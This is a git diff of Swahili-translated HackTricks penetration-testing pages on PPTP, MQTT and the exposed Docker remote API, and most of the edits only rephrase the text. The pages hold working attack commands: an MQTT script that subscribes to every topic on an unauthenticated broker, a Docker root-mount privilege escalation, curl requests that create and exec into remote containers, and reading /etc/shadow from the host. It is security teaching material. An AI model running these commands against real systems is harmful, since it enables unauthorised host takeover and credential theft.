[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**.
@ -30,15 +30,15 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
**Itifaki ya Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa ajili ya **upatikanaji wa mbali** kwenye vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), hutumika kusimbua data inayotumwa kati ya wenzao. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano kupitia mtandao, ikihakikisha kuwa data inayobadilishwa inabaki kuwa ya siri na kulindwa dhidi ya ufikiaji usioidhinishwa.
**Itifaki ya Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa ajili ya **upatikanaji wa mbali** kwenye vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), hutumika kusimbua data inayotumwa kati ya wenzao. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano kupitia mtandao, ikihakikisha kuwa data inayobadilishana inabaki kuwa ya siri na kulindwa dhidi ya ufikiaji usioidhinishwa.
**Bandari ya Msingi**: 1723
**Bandari ya Chaguo**:1723
## Uorodheshaji
## Urambazaji
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Kujaribu Kuvunja](../generic-methodologies-and-resources/brute-force.md#pptp)
### [Kuvunja Nguvu](../generic-methodologies-and-resources/brute-force.md#pptp)
## Mapungufu
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
@ -54,6 +54,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,18 +30,18 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
**MQ Telemetry Transport (MQTT)** inajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu na uzito wake. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, inalenga kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uga unaoongezeka wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo wa bandari na maisha ya betri ni muhimu.
**Usafirishaji wa Telemetri ya MQ (MQTT)** unajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu wake wa kipekee na uzito wake. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, lengo lake ni kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uga unaokua wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo na maisha ya betri ni muhimu.
**Bandari ya msingi:** 1883
**Bandari ya default:** 1883
```
PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
## Kuchunguza trafiki
Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uunganisho. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uunganisho uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri ni batili, hivyo kuzuia uunganisho.
Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uhusiano. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uhusiano uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri si sahihi, hivyo kuzuia uhusiano.
Kwa mfano, ikiwa wakala atakataa uunganisho kutokana na anwani za siri batili, hali itaonekana kama ifuatavyo:
Kwa mfano, ikiwa wakala anakataa uhusiano kutokana na anwani za siri zisizo sahihi, hali ingeonekana kama ifuatavyo:
```
{
"returnCode": "0x05",
@ -50,11 +50,11 @@ Kwa mfano, ikiwa wakala atakataa uunganisho kutokana na anwani za siri batili, h
```
![](<../.gitbook/assets/image (973).png>)
### [**Kuforce MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
### [**Kuvunja Nguvu MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
## Pentesting MQTT
**Uthibitisho ni hiari kabisa** na hata kama uthibitisho unafanywa, **encryption haiitumiwi kwa chaguo-msingi** (mikopo hutumwa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila.
**Uthibitisho ni hiari kabisa** na hata kama uthibitisho unafanywa, **encryption haijatumika kwa chaguo-msingi** (mikopo hutumwa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila.
Kuunganisha kwenye huduma ya MQTT unaweza kutumia: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) na kujisajili kwenye mada zote kwa kufanya:
```
@ -70,7 +70,7 @@ apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
Au unaweza **kutekeleza nambari hii ili kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitisho, kusajili kila mada na kuzisikiliza**:
Au unaweza **kukimbia huu msimbo kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitisho, kusajili kila mada na kuzisikiliza**:
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -120,35 +120,35 @@ Kila pakiti ya MQTT ina kichwa kilichofungwa (Mchoro 02).Mchoro 02: Kichwa Kilic
### Aina za Pakiti
* CONNECT (1): Kuanzishwa na mteja kuomba uhusiano kwa seva.
* CONNACK (2): Kuthibitishwa kwa seva kwa uhusiano uliofanikiwa.
* PUBLISH (3): Hutumiwa kutuma ujumbe kutoka kwa mteja kwenda kwa seva au kinyume chake.
* CONNECT (1): Kuanzishwa na mteja kuomba uhusiano na seva.
* CONNACK (2): Kuthibitisha seva ya uhusiano uliofanikiwa.
* PUBLISH (3): Kutumika kutuma ujumbe kutoka kwa mteja kwenda kwa seva au kinyume chake.
* PUBACK (4): Kuthibitisha pakiti ya PUBLISH.
* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikihakikisha ujumbe unapokelewa.
* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikidhibitisha ujumbe umepokelewa.
* PUBREL (6): Hakikisho zaidi katika utoaji wa ujumbe, ikionyesha kutolewa kwa ujumbe.
* PUBCOMP (7): Sehemu ya mwisho ya itifaki ya utoaji ujumbe, ikionyesha kukamilika.
* SUBSCRIBE (8): Ombi la mteja kusikiliza ujumbe kutoka kwa mada.
* SUBACK (9): Kuthibitishwa kwa seva ya ombi la SUBSCRIBE.
* SUBACK (9): Kuthibitisha ya seva ya ombi la SUBSCRIBE.
* UNSUBSCRIBE (10): Ombi la mteja kuacha kupokea ujumbe kutoka kwa mada.
* UNSUBACK (11): Majibu ya seva kwa ombi la UNSUBSCRIBE.
* PINGREQ (12): Ujumbe wa moyo wa kupelekwa na mteja.
* PINGRESP (13): Majibu ya seva kwa ujumbe wa moyo.
* DISCONNECT (14): Kuanzishwa na mteja kumaliza uhusiano.
* Thamani mbili, 0 na 15, zimewekwa kama zilizohifadhiwa na matumizi yao ni marufuku.
* Thamani mbili, 0 na 15, zimewekwa kama zimehifadhiwa na matumizi yake ni marufuku.
## Shodan
* `port:1883 MQTT`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** inayotoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** hapa:
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}

View file

@ -1,24 +1,24 @@
# 2375, 2376 Kupima Usalama wa Docker
# 2375, 2376 Kupima Docker
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochomwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
@ -32,17 +32,17 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
#### Ni Nini
Docker ni **jukwaa kuu** katika tasnia ya **containerization**, likiongoza **uvumbuzi endelevu**. Inarahisisha uumbaji na usambazaji wa maombi, kutoka kwa **jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali.
Docker ni **jukwaa kuu** katika **tasnia ya kubeba kontena**, likiongoza **ubunifu endelevu**. Inarahisisha uumbaji na usambazaji wa maombi, kutoka **za jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali.
#### Miundo ya msingi ya Docker
#### Miundo ya msingi ya docker
* [**containerd**](http://containerd.io): Hii ni **runtime msingi** kwa kontena, ikishughulikia **usimamizi wa kina wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**.
* **container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua kwa urahisi kutoka kwa **runc** baada ya kontena kuanzishwa.
* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **runtime wa kontena wa mwanga na wa kipekee**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd kuanzisha na kusimamia kontena kulingana na **mwongozo wa OCI**, ikibadilika kutoka kwa **libcontainer** ya awali.
* [**containerd**](http://containerd.io): Hii ni **msingi wa msingi** kwa kontena, ikishughulikia **usimamizi kamili wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha picha na uhifadhi**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**.
* **Container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua nafasi ya **runc** baada ya kontena kuanzishwa.
* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **mizigo mwepesi na wa kawaida wa mzunguko wa maisha ya kontena**, runc inalinganishwa na **kiwango cha OCI**. Inatumika na containerd kuanza na kusimamia kontena kulingana na **mwongozo wa OCI**, ikibadilika kutoka kwa **libcontainer** ya awali.
* [**grpc**](http://www.grpc.io) ni muhimu kwa **kurahisisha mawasiliano** kati ya containerd na **docker-engine**, ikihakikisha **mwingiliano wenye ufanisi**.
* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa runtime na picha, na toleo jipya la Docker likiwa **linazingatia viwango vya picha na runtime** vya OCI vyote.
* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa muda wa mzunguko na picha, na toleo la hivi karibuni la Docker linazingatia viwango vya **picha na mzunguko wa OCI**.
#### Amri za Msingi
#### Amri za msingi
```bash
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
docker info #Get more infomarion about docker settings
@ -67,9 +67,9 @@ docker system prune -a
```
#### Containerd
**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kurahisisha utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kwa lengo la kuacha sehemu zisizo za lazima. Hata hivyo, kutimiza lengo hili kikamilifu kunatambuliwa kuwa changamoto.
**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kutia rahisi utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kwa kujitahidi kuacha sehemu zisizo za lazima. Hata hivyo, kufikia lengo hili kikamilifu kunatambuliwa kuwa changamoto.
Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usanidi wa mtandao**. Mtandao unachukuliwa kuwa sehemu muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha vipengele vya mtandao kusimamiwa na majukwaa inayounga mkono.
Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usimamizi wa mtandao**. Mtandao unachukuliwa kuwa kipengele muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha sehemu za mtandao zisimamiwe na majukwaa inayounga mkono.
Wakati **Docker inatumia Containerd** kutekeleza vyombo, ni muhimu kutambua kwamba Containerd inasaidia tu sehemu ya utendaji wa Docker. Kwa kusisitiza, Containerd haina uwezo wa usimamizi wa mtandao uliopo kwenye Docker na haisaidii uundaji wa makundi ya Docker moja kwa moja. Tofauti hii inaonyesha jukumu lililolengwa la Containerd kama mazingira ya utekelezaji wa vyombo, ikipeleka vipengele vilivyospecializika zaidi kwa majukwaa inayoshirikiana nayo.
```bash
@ -89,15 +89,15 @@ ctr container delete <containerName>
```
#### Podman
**Podman** ni injini ya kontena ya chanzo wazi inayofuata [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **kontena za bila root**, kuruhusu watumiaji kuendesha kontena bila mamlaka ya mzizi.
**Podman** ni injini ya chombo cha wazi ambayo inazingatia [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **makontena yasiyo na mizizi**, kuruhusu watumiaji kuendesha makontena bila mamlaka ya mizizi.
Podman imeundwa kuwa sawa na API ya Docker, kuruhusu matumizi ya amri za Docker CLI. Ulinganifu huu unajumuisha mfumo wake, ambao unajumuisha zana kama **Buildah** kwa kujenga picha za kontena na **Skopeo** kwa operesheni za picha kama vile kusukuma, kuvuta, na kupekua. Maelezo zaidi kuhusu zana hizi yanaweza kupatikana kwenye [ukurasa wao wa GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
Podman imeundwa kuwa sawa na API ya Docker, kuruhusu matumizi ya amri za Docker CLI. Ulinganifu huu unajumuisha mfumo wake, ambao unajumuisha zana kama **Buildah** kwa kujenga picha za makontena na **Skopeo** kwa operesheni za picha kama vile kusukuma, kuvuta, na kupekua. Maelezo zaidi kuhusu zana hizi yanaweza kupatikana kwenye [ukurasa wao wa GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
**Tofauti Kuu**
* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon ya nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha kontena zinaendeshwa na mamlaka za mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa mzizi.
* **Uingizaji wa systemd**: Podman inaingiliana na **systemd** kusimamia kontena, kuruhusu usimamizi wa kontena kupitia vitengo vya systemd. Hii inatofautiana na matumizi ya Docker ya systemd hasa kwa kusimamia mchakato wa daemon wa Docker.
* **Kontena za Bila Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya mamlaka ya mtumiaji anayeanzisha. Mbinu hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomozaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa mzizi.
* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon ya nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha makontena hufanya kazi kwa mamlaka ya mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa mizizi.
* **Uingizaji wa systemd**: Podman inaingiliana na **systemd** kusimamia makontena, kuruhusu usimamizi wa kontena kupitia vitengo vya systemd. Hii inatofautiana na matumizi ya Docker ya systemd hasa kwa kusimamia mchakato wa daemon wa Docker.
* **Makontena Yasiyo na Mizizi**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha makontena chini ya mamlaka ya mtumiaji anayeanzisha. Mbinu hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa mizizi.
Mbinu ya Podman inatoa mbadala salama na mpana kwa Docker, ikisisitiza usimamizi wa mamlaka ya mtumiaji na ufanisi na mifumo ya kazi ya Docker iliyopo.
@ -113,7 +113,7 @@ podman ls
### Taarifa Msingi
Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho, ikiruhusu mshambuliaji kuanza kontena ya docker yenye mamlaka. Kwa kutumia Remote API mtu anaweza kuunganisha mwenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji.
Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho kuruhusu mshambuliaji kuanza kontena la docker lenye mamlaka. Kwa kutumia Remote API mtu anaweza kuambatanisha mwenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji.
**Bandari ya chaguo-msingi:** 2375
```
@ -166,13 +166,13 @@ Ikiwa unaweza **kuwasiliana na API ya mbali ya docker kwa kutumia amri ya `docke
Unaweza `export DOCKER_HOST="tcp://localhost:2375"` na **kuepuka** kutumia parameter ya `-H` na amri ya docker
{% endhint %}
**Kuongezeka kwa mamlaka haraka**
**Kupandisha hadhi kwa haraka**
```bash
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
Wakati mwingine utaona **2376** ikiwa wazi kwa **TLS** endpoint. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl.
Wakati mwingine utaona **2376** ikiwa wazi kwa endpoint ya **TLS**. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl.
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -202,7 +202,7 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
#Delete stopped containers
curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
```
Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri hizi: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri kutoka: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
#### Moja kwa moja
```bash
@ -217,7 +217,7 @@ Kwenye ukurasa ufuatao unaweza kupata njia za **kutoroka kutoka kwa chombo cha d
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
Kwa kuitumia hii, niwezekana kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwenye mashine:
Kwa kuitumia hii, niwezekana kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwa mashine:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
@ -289,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### Kurekodi Shughuli Zenye Mashaka
* Unaweza kutumia zana [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) kugundua **tabia zenye mashaka kwenye vyombo vinavyotekelezwa**.
* Tafadhali angalia sehemu ifuatayo jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **kuanza kurekodi shughuli zenye mashaka**. Katika kesi hii, imedokeza vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao na kufunga nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyofunguliwa ndani ya moja ya vyombo.
* Tafadhali angalia sehemu ifuatayo jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **kuanza kurekodi shughuli zenye mashaka**. Katika kesi hii, imegundua vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao na kufunga nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyoanzishwa ndani ya moja ya vyombo.
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -340,15 +340,15 @@ Unaweza kutumia auditd kufuatilia docker.
